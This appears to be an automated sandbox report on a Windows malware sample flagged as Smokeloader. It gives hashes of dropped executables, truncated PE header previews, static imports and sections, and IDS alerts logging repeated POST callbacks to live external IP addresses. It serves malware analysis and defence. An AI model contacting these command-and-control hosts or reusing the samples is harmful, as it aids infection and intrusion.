SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Temp\89ED.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2021096
Entropy (8bit):	4.368133315535763
Encrypted:	false
SSDEEP:	24576:wUPm96z4S/zCtTFL/mcOJmsEMAX5Amwg0a:wUPm6/EFSyJdX5Am5
MD5:	FBFC7A6D58571AF46628818A232931A5
SHA1:	A0CADE21EAE601272369479ADD5B8823E3399FAC
SHA-256:	715C6CB65D337B5BABBBF414D1D18A2E9AFDE116BFEE5413C8CAB645E8522C27
SHA-512:	A1D26181FB43B05D23A0D3B9C74BD73903009BB861073155D9564053B340E09B85A8F3EA51AB2A6A4617555A91C237F6843E83CEB2E609B3231D79D4CE284730
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@............................. ......]V.......................................................S..........`@..............hR...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc...`@.......B...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C12E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	6.283574300449475
Encrypted:	false
SSDEEP:	3072:co/xLMaSrWrgPkJ7A/LRnTT1YiNNGJoD5k8Ewv6ClhJVfkpWAw5EcfkpWAQyWIE:c8xLVjrE/FPNNGYHRVfXZ1fXB7
MD5:	49A8BAC4600ABA0061CD216A4C75185C
SHA1:	2064A33ACCB877BB6226ED637F90ED8C5669AC52
SHA-256:	D8B3CD0FFF8C02D9B9FD648CD26B1E211614B2897DAA6FCDAD740C818DED25F6
SHA-512:	D37D431B0654D569449CB1959C849475BDFC8AF0AEA1EDFD7CD105F62B5B90698857367A7A97A7E4E4B596CB347251D3D6FC45D1D6D6AA2DD74D774FAA82CD6D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..\|..\|..\|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..\|.....bRi.}..bRw.}..bRr.}..Rich\|..................PE..L......d.................d........................@..........................P......V...........................................P....p..8............................................................................................................text....b.......d.................. ..`.rdata..&!......."...h..............@..@.data...............................@....tasifal\|....@......................@....tls.........P......................@....cuda........`......................@....rsrc...8....p......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\bbdeaec

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	6.283574300449475
Encrypted:	false
SSDEEP:	3072:co/xLMaSrWrgPkJ7A/LRnTT1YiNNGJoD5k8Ewv6ClhJVfkpWAw5EcfkpWAQyWIE:c8xLVjrE/FPNNGYHRVfXZ1fXB7
MD5:	49A8BAC4600ABA0061CD216A4C75185C
SHA1:	2064A33ACCB877BB6226ED637F90ED8C5669AC52
SHA-256:	D8B3CD0FFF8C02D9B9FD648CD26B1E211614B2897DAA6FCDAD740C818DED25F6
SHA-512:	D37D431B0654D569449CB1959C849475BDFC8AF0AEA1EDFD7CD105F62B5B90698857367A7A97A7E4E4B596CB347251D3D6FC45D1D6D6AA2DD74D774FAA82CD6D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..\|..\|..\|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..\|.....bRi.}..bRw.}..bRr.}..Rich\|..................PE..L......d.................d........................@..........................P......V...........................................P....p..8............................................................................................................text....b.......d.................. ..`.rdata..&!......."...h..............@..@.data...............................@....tasifal\|....@......................@....tls.........P......................@....cuda........`......................@....rsrc...8....p......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wideaec

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	229888
Entropy (8bit):	6.265416660154845
Encrypted:	false
SSDEEP:	3072:yxLlt/h9UgZelpkNYTbUo/OBBce9j5o28Ewv6ClhJt/5EYjyWIE:yxLltJ9ZskKTQoWB+HRNN7
MD5:	08E3912BD337BFF072BD1346DDC39F3A
SHA1:	4968A92E8D90C576EA9BED482B5D36DE2254E0E1
SHA-256:	CAE15EB4334C0D36ED9152D852766F970DF9A0159895050742CA1036D54B0C37
SHA-512:	68ABB38096E0ABE9896C7215BCC2DACFE4BB06C7B61FC905E2BD6A7575AC4BB61F56F1CA154F7187D6F6129633E81CD2DC4E28054987889F5C5D36367084FDE2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..\|..\|..\|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..\|.....bRi.}..bRw.}..bRr.}..Rich\|..................PE..L...i.Le.................\...................p....@..........................@......c...........................................P....`..8............................................................................p...............................text....[.......\.................. ..`.rdata..&!...p..."...`..............@..@.data...............................@....xezuxe.\|....0......................@....tls.........@......................@....yuvatom.....P......................@....rsrc...8....`......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wideaec:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.265416660154845
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HaPJ2rPP6w.exe
File size:	229'888 bytes
MD5:	08e3912bd337bff072bd1346ddc39f3a
SHA1:	4968a92e8d90c576ea9bed482b5d36de2254e0e1
SHA256:	cae15eb4334c0d36ed9152d852766f970df9a0159895050742ca1036d54b0c37
SHA512:	68abb38096e0abe9896c7215bcc2dacfe4bb06c7b61fc905e2bd6a7575ac4bb61f56f1ca154f7187d6f6129633e81cd2dc4e28054987889f5c5d36367084fde2
SSDEEP:	3072:yxLlt/h9UgZelpkNYTbUo/OBBce9j5o28Ewv6ClhJt/5EYjyWIE:yxLltJ9ZskKTQoWB+HRNN7
TLSH:	69244A1076FED0E6F7B74A359AB0DDA899FBBCF3A970419B22C4562F18316808951733
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..\|...\|...\|....Ou.}...bRg.f...bRv.l...bR`.'...[...{...\|.......bRi.}...bRw.}...bRr.}...Rich\|...................PE..L...i.Le...

File Icon


Icon Hash:	17694cb2b24d2117

Static PE Info

General

Entrypoint:	0x401882
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x654CB569 [Thu Nov 9 10:33:13 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0d528cb11b391cc85272fa6bac17f245

Entrypoint Preview

Instruction
call 00007F1D2140F149h
jmp 00007F1D2140C11Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041B808h], eax
mov dword ptr [0041B804h], ecx
mov dword ptr [0041B800h], edx
mov dword ptr [0041B7FCh], ebx
mov dword ptr [0041B7F8h], esi
mov dword ptr [0041B7F4h], edi
mov word ptr [0041B820h], ss
mov word ptr [0041B814h], cs
mov word ptr [0041B7F0h], ds
mov word ptr [0041B7ECh], es
mov word ptr [0041B7E8h], fs
mov word ptr [0041B7E4h], gs
pushfd
pop dword ptr [0041B818h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041B80Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041B810h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041B81Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041B758h], 00010001h
mov eax, dword ptr [0041B810h]
mov dword ptr [0041B70Ch], eax
mov dword ptr [0041B700h], C0000409h
mov dword ptr [0041B704h], 00000001h
mov eax, dword ptr [0041A008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041A00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x187ac	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x116000	0x1db38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x183f8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17000	0x1a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x15bff	0x15c00	faf0ddbd774f82293d5ce808a058ac83	False	0.8077743354885057	data	7.50895133113937	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x17000	0x2126	0x2200	540e2026171ab81664b69cdd80b86726	False	0.35891544117647056	data	5.484532619707042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0xf8f9c	0x1800	a4c068bb548c43da9045f6650014ab7a	False	0.14567057291666666	data	1.584258087696549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xezuxe	0x113000	0x7c	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x114000	0x51d	0x600	53e979547d8c2ea86560ac45de08ae25	False	0.013020833333333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yuvatom	0x115000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x116000	0x1db38	0x1dc00	5d1515d11ff4539591b73e36b0e943b6	False	0.4643595719537815	data	5.114963564306975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x12e9a8	0x2	data			5.0
LABOWARILEMEHISE	0x12e5a8	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6277013752455796
RT_ICON	0x116a80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5714285714285714
RT_ICON	0x117928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.648014440433213
RT_ICON	0x1181d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6918202764976958
RT_ICON	0x118898	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7514450867052023
RT_ICON	0x118e00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5215767634854772
RT_ICON	0x11b3a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6219512195121951
RT_ICON	0x11c450	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6352459016393442
RT_ICON	0x11cdd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7659574468085106
RT_ICON	0x11d2b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.39418976545842216
RT_ICON	0x11e160	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5
RT_ICON	0x11ea08	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5178571428571429
RT_ICON	0x11f0d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5520231213872833
RT_ICON	0x11f638	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.34740663900414936
RT_ICON	0x121be0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.37617260787992496
RT_ICON	0x122c88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.4
RT_ICON	0x123610	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.41400709219858156
RT_ICON	0x123af0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39498933901918976
RT_ICON	0x124998	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5550541516245487
RT_ICON	0x125240	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6192396313364056
RT_ICON	0x125908	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.638728323699422
RT_ICON	0x125e70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4392589118198874
RT_ICON	0x126f18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4319672131147541
RT_ICON	0x1278a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4778368794326241
RT_ICON	0x127d70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.39418976545842216
RT_ICON	0x128c18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5
RT_ICON	0x1294c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5178571428571429
RT_ICON	0x129b88	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5520231213872833
RT_ICON	0x12a0f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.34740663900414936
RT_ICON	0x12c698	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.37617260787992496
RT_ICON	0x12d740	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.4
RT_ICON	0x12e0c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.41400709219858156
RT_STRING	0x12eb68	0x3c2	data			0.4656964656964657
RT_STRING	0x12ef30	0x64c	data			0.43424317617866004
RT_STRING	0x12f580	0x7aa	data			0.4260958205912334
RT_STRING	0x12fd30	0x798	data			0.42335390946502055
RT_STRING	0x1304c8	0x6fa	data			0.4232922732362822
RT_STRING	0x130bc8	0x73c	data			0.423866090712743
RT_STRING	0x131308	0x7a8	data			0.4229591836734694
RT_STRING	0x131ab0	0x684	data			0.4316546762589928
RT_STRING	0x132138	0x7f4	data			0.42288801571709234
RT_STRING	0x132930	0x6bc	data			0.42981438515081205
RT_STRING	0x132ff0	0x5be	data			0.445578231292517
RT_STRING	0x1335b0	0x4ea	data			0.4467408585055644
RT_STRING	0x133aa0	0x96	data			0.5933333333333334
RT_GROUP_ICON	0x123a78	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x12e530	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x11d240	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x127d08	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x12e9b0	0x1b4	data			0.573394495412844

Imports

DLL	Import
KERNEL32.dll	GetNumaProcessorNode, GetConsoleAliasExesLengthA, InterlockedDecrement, QueryDosDeviceA, GetEnvironmentStringsW, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, ReadConsoleW, FormatMessageA, ReadConsoleOutputA, SetCommState, GetVolumeInformationA, LoadLibraryW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesA, SetConsoleMode, GetFileAttributesW, GetBinaryTypeA, GetConsoleAliasesLengthW, GetLastError, GetLongPathNameW, GetProcAddress, CopyFileA, LoadLibraryA, LocalAlloc, MoveFileA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetCommTimeouts, FreeEnvironmentStringsW, BuildCommDCBA, FatalAppExitA, WriteConsoleOutputAttribute, ReleaseMutex, FindAtomW, CreateFileA, SetStdHandle, GetStdHandle, SetPriorityClass, HeapAlloc, HeapReAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, WriteFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetFilePointer, CloseHandle
USER32.dll	GetFocus
ADVAPI32.dll	ObjectPrivilegeAuditAlarmA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T19:17:31.163380+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	177.129.90.106	80	TCP
2024-10-04T19:17:32.743839+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	177.129.90.106	80	TCP
2024-10-04T19:17:34.015007+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	177.129.90.106	80	TCP
2024-10-04T19:17:35.661779+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	177.129.90.106	80	TCP
2024-10-04T19:17:37.176772+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	177.129.90.106	80	TCP
2024-10-04T19:17:38.461103+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	177.129.90.106	80	TCP
2024-10-04T19:17:39.742990+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	177.129.90.106	80	TCP
2024-10-04T19:17:41.936055+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	177.129.90.106	80	TCP
2024-10-04T19:17:43.234932+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	177.129.90.106	80	TCP
2024-10-04T19:17:44.532366+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	177.129.90.106	80	TCP
2024-10-04T19:17:46.021153+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	177.129.90.106	80	TCP
2024-10-04T19:17:47.327483+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	177.129.90.106	80	TCP
2024-10-04T19:17:48.977509+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	177.129.90.106	80	TCP
2024-10-04T19:17:50.437179+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	177.129.90.106	80	TCP
2024-10-04T19:17:51.852257+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	177.129.90.106	80	TCP
2024-10-04T19:17:53.125210+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	177.129.90.106	80	TCP
2024-10-04T19:17:54.706817+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	177.129.90.106	80	TCP
2024-10-04T19:17:55.981022+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	177.129.90.106	80	TCP
2024-10-04T19:17:57.270101+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	177.129.90.106	80	TCP
2024-10-04T19:17:58.562666+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	177.129.90.106	80	TCP
2024-10-04T19:17:59.955931+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	177.129.90.106	80	TCP
2024-10-04T19:18:01.349075+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49764	177.129.90.106	80	TCP
2024-10-04T19:18:02.656822+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49771	177.129.90.106	80	TCP
2024-10-04T19:18:04.047722+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49781	177.129.90.106	80	TCP
2024-10-04T19:18:06.619406+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49798	177.129.90.106	80	TCP
2024-10-04T19:18:08.108094+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49804	177.129.90.106	80	TCP
2024-10-04T19:18:09.566598+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49815	177.129.90.106	80	TCP
2024-10-04T19:18:11.147908+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49819	177.129.90.106	80	TCP
2024-10-04T19:18:12.412956+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49826	177.129.90.106	80	TCP
2024-10-04T19:18:13.846347+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49833	177.129.90.106	80	TCP
2024-10-04T19:18:19.449251+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49864	177.129.90.106	80	TCP
2024-10-04T19:19:30.096822+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50035	177.129.90.106	80	TCP
2024-10-04T19:19:37.691008+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50036	177.129.90.106	80	TCP
2024-10-04T19:19:47.223334+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50037	177.129.90.106	80	TCP
2024-10-04T19:19:58.725636+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50038	177.129.90.106	80	TCP
2024-10-04T19:20:14.259793+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50039	180.75.11.133	80	TCP
2024-10-04T19:20:28.126238+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50040	180.75.11.133	80	TCP
2024-10-04T19:20:42.965243+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50041	180.75.11.133	80	TCP
2024-10-04T19:20:57.598842+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50042	180.75.11.133	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 19:17:29.892277956 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:29.900686026 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:29.900872946 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:29.901056051 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:29.901079893 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:29.908004999 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:29.908469915 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.162223101 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.163259983 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.163379908 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.189086914 CEST	49736	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.194627047 CEST	80	49736	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.203016043 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.208080053 CEST	80	49737	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.208173037 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.219259024 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.219259024 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:31.224256039 CEST	80	49737	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:31.224315882 CEST	80	49737	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:32.743103981 CEST	80	49737	177.129.90.106	192.168.2.4
